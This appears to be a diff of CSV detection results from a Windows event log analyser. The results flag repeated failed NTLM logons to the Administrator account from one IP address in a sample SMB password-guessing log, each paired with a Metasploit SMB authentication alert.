+2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dAH2mHJ4ZK5GS2p0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lV2ZIWGGwlkyEMRB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sum2yMFio9KLwZk5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fICXSRvv9Vm0uVpY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IgrOk6Fjp0QtfJ3i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OPKoHLtxNoiG65sl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NctXRH1DR3slfVxQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vLnAs36K1mTivu2w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H7crZQ0eQ5RDNIp7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yHjgGhEtZgNwjaii  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5gi2SS2mQiDylQ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kqWJGguiWBEplJiZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RWP4luPa3lFolQVI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5K9DQWbzslRZZMSC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5qm0L113v24jlfjx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seuUjyGmNlyYT4tU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FljAF4LWLmWNa3kL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RnN5mBOaAvYu25G7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: llBt31S46QVzg0Ki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1rvJUZo91Kka0G1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Zqi86ZSFGRnoFM4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GeyeVdCUmHEKxR8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DwxJVXt79KBZalqS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TDfRu1OTlHmyc38P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OLCAMPDWti9hjHtV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k2eViuJeorX2peGP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: davOE9p1fF2LbDP7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YFQsEbZnm94eSuUl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UnNcBIPoWdJH0x7M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Fw1xVFyar0Cal2J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FWzn4Oa8PQdH9Gqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b68beIB5BKyMv8d3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HeXSJhEXzpiRX8BT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BQ8Zu7ByLWddD4Tk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: paQzUptV8scmJvsG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WQLsoIX9LPvbockz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRYbdVMbUlqFK8oM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OSO730O1fxDL4DfQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5wmniv339HLGKB4u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rO3mxvgSES0lVN34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fvK9k9tnCq5hwBqe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ujFfMT6I6L8OHag9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FWKY2Wh21sePUR1L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6E6yf8D5cPOEwR0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OpFho8k52BkBlg4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucDvfSfDYZzjNWFS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
